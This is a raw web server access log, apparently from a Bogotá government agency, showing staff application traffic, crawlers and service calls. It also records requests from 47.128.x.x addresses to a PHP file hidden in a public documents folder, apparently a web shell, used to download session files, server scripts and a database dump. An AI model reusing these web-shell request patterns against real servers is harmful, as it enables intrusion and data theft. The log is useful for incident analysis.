186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:15 -0500] "GET /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 31768
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 10464
186.29.34.153 - - [27/Jun/2024:10:24:16 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 1982
66.249.66.11 - - [27/Jun/2024:10:24:29 -0500] "GET /BLA/resoluciones/AUTOS%202023/06479.pdf HTTP/1.1" 200 442695
66.249.66.13 - - [27/Jun/2024:10:24:31 -0500] "GET /BLA/resoluciones/AUTOS%202023/10953.pdf HTTP/1.1" 200 439921
186.29.34.153 - - [27/Jun/2024:10:24:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 1998
186.29.34.153 - - [27/Jun/2024:10:24:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml HTTP/1.1" 200 36181
186.29.34.153 - - [27/Jun/2024:10:24:42 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:42 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 200 1330
186.29.34.153 - - [27/Jun/2024:10:24:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:24:42 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 200 28091
40.77.167.50 - - [27/Jun/2024:10:24:43 -0500] "GET /BLA/resoluciones/AUTOS%202023/05842.pdf HTTP/1.1" 200 395195
52.167.144.174 - - [27/Jun/2024:10:24:46 -0500] "GET /desde-el-1-de-mayo-habra-nueva-normativa-para-la-gestion-de-aceites-usados-de-origen-industrial.html HTTP/1.1" 200 1006
186.29.34.153 - - [27/Jun/2024:10:24:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 19435
186.29.34.153 - - [27/Jun/2024:10:24:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 19441
201.245.192.253 - - [27/Jun/2024:10:25:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:10:25:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.29.34.153 - - [27/Jun/2024:10:25:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 3890
66.249.66.12 - - [27/Jun/2024:10:25:34 -0500] "GET /BLA/resoluciones/AUTOS%202023/4932.pdf HTTP/1.1" 200 451079
186.102.26.188 - - [27/Jun/2024:10:25:36 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+JT5Z3piSDVp8Lu/K/misUbAa8QyoEsbe1ctpDFls+Kvb2AWhCmA0G&y=U2FsdGVkX19xclhcbgBdlfUWzyfKKmdDV7Gt49KoUUYvlMWbCUM7ZNRDK5u/MWmK HTTP/1.1" 200 30
186.102.26.188 - - [27/Jun/2024:10:25:36 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/BlC2KZm6hC9/lYVw4B3z37yNC+rE+AELGhF9WcdnRdiVQ0TCQK7atu96MCCJ14JHL/x9DLF06W/avYQvnncbgKOMP0drYXgg=&u=U2FsdGVkX1+ecldowzYFPoFJOXnaIoG7dJvJhWeAVE3gfbpoD4iZepdQ+4XPQAFE&y=U2FsdGVkX19xclhcbgBdlfUWzyfKKmdDV7Gt49KoUUYvlMWbCUM7ZNRDK5u/MWmK HTTP/1.1" 200 97
186.102.26.188 - - [27/Jun/2024:10:25:37 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19kG6Ty22lOLvXG00k/cWKRYAEtSphgF111V9PJMlfcLJ9uRQhg82fzHd3U8hF7ml3jrLt9uTxww7bkj61J1RVZviJdO1yZ6SyBe7b7kLlxussj+0KUHePTlyGQoZJfyoebrdK1gvIrMCah0slay4EuOXALPRi2xACFLjLlb9ZCXkZBST2eaAGgRdX3Q4FS9WEXH6IJhCDtCl6PpClIIbK/hewVKE8Dr9sNYtwbHmvTJrc+Q7Cpq7DUmVXgOVwT+quum9CeKrbXQujqi1tOxjgImn+Z9z+/vmqXHd9XdyP/dB2GlSXLberFmChFbiIL0s3qpLdMRqfXyasF8ua0JlWSF4UA0EuHu/0xBZPdTEDGUMveORD8M11ItgQ5QQ8jfJwq/nkkzDpZC64EFnviRriJdyzcSny/JvFMOLNVMqbzzOjVJImm2gSwdlVq5LmZzr0e2dvbghTrAIUPP+D1gHmqDYHQpjI8mMTomnkO6Qvzr8/FCRh0jB43r0S7gM/86JRIJPuwBl+MpB999qyK/LShiJV7QzAcKR3hupRTQgIe1dy9uD9rRHBhHouEfNVDBqAfOKf3inkTAmepch1LVlwINcs37jgJhPiogjwSDelgoO0QnrcmqwvTKEsUqqLN2ej8wx18JvrZ2L66I3+5BgjI4Mfnn6d+HR10UMnbPf/fSEATqGwrq3arG8In6TUvbKjKJU/m2haPj41gBUxFFBvKvKBjXEL77T+zl0DH5VuJmeeaUje6ajNWChdj0c09KQf9gNtryor8p0UpM6zG4dy5MPRSheoQ91tJq2pvkOt2nvg9FOTAjokd6KghWuHmk9Yz4LfhRWs7jjwyTeT+zIMhYMr1KuDGvTcVzTssehaV7rKPbO8EGVLsunxit/oyU9Txxu1yOA/LDjDJWiHphh7rxmOC4yDkICC+zGZhLmqsVArOFBmjHZTLCBrQxGnkuuJyQeHVwLvol6tm4eppw9zrzFhRu1Bb/RO124NdudGwK2sXFR0yFf7OpkzAg3WRVUyDEpUoZggYEjEVR99CWK8OHMLAN2Qge7Txh4vtweZ4stBCjFaK7j6VFtKp/+A8AOe/nsv9mNpyzqBPQbwk4Jb3UIEncZpVU9vhZ+YvA7nEO6CVqSwJU9worux9BHwLUQ1T6mUNNW4Nh8df/FUCjVi8KrhurAg6Y9ERIOVHzuGmtNaPbWdtv/q+qi1gLJ7sLtXHhH5YWwZr72XH2VajsvfOgi96t2fsiIIPqgExBMS5QWnGzjggItbX2LLADi+w1Tp530VUKhlQbz5xn/SkT/oPa8XyO+yQWemhK9Az8uWfEgUySnqTeMe2JS/fpzL7wrrhSvR+M6Yhbgf0tzLsTlM6k459FpNLOYBUpMkl4Ql+P8R+DI6alBq159uCKxwbQUR7jwlht/hPrOcMsSoVoycT6aDLq1TfHckhXZgEo6OQd75MLOYwtv3+pQo7uQ6Z60wpbjo1jWWL2WWf/wFi0q+HMyj/tq0IFpM2oj46Njv/FvVB8RFn8KTJYU0pbzXR6+9uX1s5k+tVON8XTq6p6B+d2WdO38xpHhfdLZpo5K9EjEqggMuwUG2L49Cx5rPHn58bZ9I52JnpZSS9iWcsZVHKlcuxiQ57CDlQFTCdyHrH7PWQZNToXn4fGFFUuNbOHVWt4BAbCgI16Wh6/jJdiglkf0LnPZVLsZauCOg5KnXlZfnTFoWe1WCYGYzEG6Ik++8ug0VKshBmsv4x1YrZ3puwljRaJ31CeXkxsGBcHJqdP1JB2p3J1STB&u=U2FsdGVkX1+ecldowzYFPoFJOXnaIoG7dJvJhWeAVE3gfbpoD4iZepdQ+4XPQAFE&y=U2FsdGVkX19xclhcbgBdlfUWzyfKKmdDV7Gt49KoUUYvlMWbCUM7ZNRDK5u/MWmK HTTP/1.1" 200 7332
186.102.26.188 - - [27/Jun/2024:10:25:37 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+wBKnOwwRURLK+eytW06gMU4AOyCD7UcN0UZZwwR3WvfDXPN4bvqKGPO858Q9hH0eqVo7K6OXDAQGGHdtltnxV5RJxYN1H/rqbRSyHI2h/Y5QnwjieHT2OqEKQJ8KLiNB9JyR5IjTTIlHkx6/X+CJiqwW7iC9EaAkAKsovQwxec+xjssWnVPIELvjQHACP2WtsM/6Ax/Mxgbzrxtq3bgbgwxHehxmyxUGJF5xizS0IzAws4A1sWfLCq4GlLVE7N88SGkhX0JXYfMPRHtuE0AfrUmDeTXjt+WUhn5uy6rlH/pL6lJgtDXtSewBHwqqhQBbWC4Wx8li+ydII+PEXkf76GtUbz3izS8+E5r7iywwa3SE8n6V3vDlR+/hUbpeJGqrcPypjoTozJxV+ArI+ug7zJ5H8q/v2J1KWPqct200is5dWUM+7FRVkbFl1SI+upAdx0mzLdF+43mSjU4T3enhKP5o8U1Bx6h9K16mDMnNVmweAKsDaA+dg+eYLNy4fKyusOQ75kjLbqymE1qD87IJVM+qlyCs0kHYdgJPR8Ka4glCc4u79e7dofsIgCjzgJRmo03LKI5fUKv+bbMuSVw9V9LlVh+j2yCVcoxq1FLoOyrPrvUPvWSfeu8TGgOy50PQUH9N6b/E2B5MJ80e7WXzFrmhHOob4eEO5iQSvFFZXimgbesOD2W+liFo6k1O4X98iQpPmBVbsgzvc8xaKjRmDMkG43wG+7BoMSi7xQ4eZdbodO5gTM2Ur&u=U2FsdGVkX1+ecldowzYFPoFJOXnaIoG7dJvJhWeAVE3gfbpoD4iZepdQ+4XPQAFE&y=U2FsdGVkX19xclhcbgBdlfUWzyfKKmdDV7Gt49KoUUYvlMWbCUM7ZNRDK5u/MWmK HTTP/1.1" 200 208
186.102.26.188 - - [27/Jun/2024:10:25:37 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+JT5Z3piSDVp8Lu/K/misUbAa8QyoEsbe1ctpDFls+Kvb2AWhCmA0G HTTP/1.1" 200 30244
172.22.2.4 - - [27/Jun/2024:10:25:52 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 304 -
66.249.66.37 - - [27/Jun/2024:10:25:58 -0500] "GET / HTTP/1.1" 200 4720
66.249.66.12 - - [27/Jun/2024:10:26:04 -0500] "GET /BLA/resoluciones/AUTOS%202023/3531.pdf HTTP/1.1" 200 424481
201.245.192.253 - - [27/Jun/2024:10:26:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.34.153 - - [27/Jun/2024:10:26:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 3867
47.128.32.218 - - [27/Jun/2024:10:26:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/navigation.php%s HTTP/1.1" 400 945
47.128.47.161 - - [27/Jun/2024:10:26:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Ctmp&f=sess_vkdetcgkqt3qpqoq0a05vrr9f0&ft=download HTTP/1.1" 200 66
186.29.34.153 - - [27/Jun/2024:10:26:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 3885
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12402
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
200.118.16.17 - - [27/Jun/2024:10:26:59 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
47.128.55.108 - - [27/Jun/2024:10:27:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5C&f=catalina_start.bat&ft=download HTTP/1.1" 200 1088
200.118.16.17 - - [27/Jun/2024:10:27:04 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2213
200.118.16.17 - - [27/Jun/2024:10:27:04 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
200.118.16.17 - - [27/Jun/2024:10:27:05 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16455
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
200.118.16.17 - - [27/Jun/2024:10:27:06 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
201.245.192.253 - - [27/Jun/2024:10:27:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.29.34.153 - - [27/Jun/2024:10:27:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudAnulacion/registrarSolicitudAnulacion.xhtml HTTP/1.1" 200 40869
186.29.34.153 - - [27/Jun/2024:10:27:13 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [27/Jun/2024:10:27:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.29.34.153 - - [27/Jun/2024:10:27:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
200.118.16.17 - - [27/Jun/2024:10:27:17 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
200.118.16.17 - - [27/Jun/2024:10:27:17 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
47.128.47.173 - - [27/Jun/2024:10:27:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-snapshots&f=20150910_encuentrodelasamericas_55fe35a6a29ae2773150920042718_scan.json&ft=download HTTP/1.1" 200 310888
201.245.192.253 - - [27/Jun/2024:10:27:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37107
201.245.192.253 - - [27/Jun/2024:10:27:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34530
200.118.16.17 - - [27/Jun/2024:10:27:21 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9852
186.29.34.153 - - [27/Jun/2024:10:27:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12900
200.118.16.17 - - [27/Jun/2024:10:27:25 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9852
200.118.16.17 - - [27/Jun/2024:10:27:27 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 9852
200.118.16.17 - - [27/Jun/2024:10:27:30 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.29.34.153 - - [27/Jun/2024:10:27:29 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 51536
186.29.34.153 - - [27/Jun/2024:10:27:32 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:32 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:32 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.29.34.153 - - [27/Jun/2024:10:27:32 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
47.128.47.179 - - [27/Jun/2024:10:27:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5C&f=ms-deprecated.php&ft=download&white=1 HTTP/1.1" 200 8984
40.77.167.50 - - [27/Jun/2024:10:27:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/1217.pdf HTTP/1.1" 304 -
200.118.16.17 - - [27/Jun/2024:10:27:37 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
200.118.16.17 - - [27/Jun/2024:10:27:43 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2048
200.118.16.17 - - [27/Jun/2024:10:27:47 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2059
172.22.2.4 - - [27/Jun/2024:10:26:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.118.16.17 - - [27/Jun/2024:10:27:50 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 6189
47.128.114.90 - - [27/Jun/2024:10:27:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-snapshots&f=20150910_encuentrodelasamericas_55fe35a6a29ae2773150920042718_database.sql&ft=download HTTP/1.1" 200 6745700
201.245.192.253 - - [27/Jun/2024:10:28:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.113.122 - - [27/Jun/2024:10:28:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5CSimplePie&f=Parser.php&ft=download HTTP/1.1" 200 11851
201.245.192.253 - - [27/Jun/2024:10:28:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
47.128.113.126 - - [27/Jun/2024:10:28:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006&f=RESOLUCION+888+DE+2006.PDF&ft=download HTTP/1.1" 200 35083
172.22.2.4 - - [27/Jun/2024:10:27:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
47.128.56.178 - - [27/Jun/2024:10:28:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=Secretaria+Distrital+de+Ambiente+Debate+en+el+Concejo+de+Bogota+-+Vallas+LED.flv&ft=download HTTP/1.1" 200 18071133
66.249.66.11 - - [27/Jun/2024:10:28:55 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202024/&sort=date&order=asc HTTP/1.1" 200 26114
201.245.192.253 - - [27/Jun/2024:10:29:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:10:29:13 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [27/Jun/2024:10:29:27 -0500] "GET /BLA/resoluciones/AUTOS%202023/0933.pdf HTTP/1.1" 200 380716
66.249.66.11 - - [27/Jun/2024:10:29:29 -0500] "GET /BLA/resoluciones/AUTOS%202023/05504.pdf HTTP/1.1" 200 2244814
201.245.192.253 - - [27/Jun/2024:10:29:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34963
172.22.2.4 - - [27/Jun/2024:10:28:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59083
201.245.192.253 - - [27/Jun/2024:10:30:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [27/Jun/2024:10:30:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34530
66.249.66.11 - - [27/Jun/2024:10:30:28 -0500] "GET /BLA/resoluciones/AUTOS%202023/4249.pdf HTTP/1.1" 200 993354
66.249.66.12 - - [27/Jun/2024:10:30:28 -0500] "GET /BLA/resoluciones/AUTOS%202023/2312.pdf HTTP/1.1" 200 425049
66.249.66.11 - - [27/Jun/2024:10:30:41 -0500] "GET /Publicaciones/2024EE127998.pdf HTTP/1.1" 304 -
216.244.66.195 - - [27/Jun/2024:10:31:06 -0500] "GET /BLA/resoluciones/AUTOS%202016/1835.pdf HTTP/1.1" 200 472506
201.245.192.253 - - [27/Jun/2024:10:31:07 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [27/Jun/2024:10:31:12 -0500] "GET /BLA/resoluciones/AUTOS%202016/1960.pdf HTTP/1.1" 200 552736
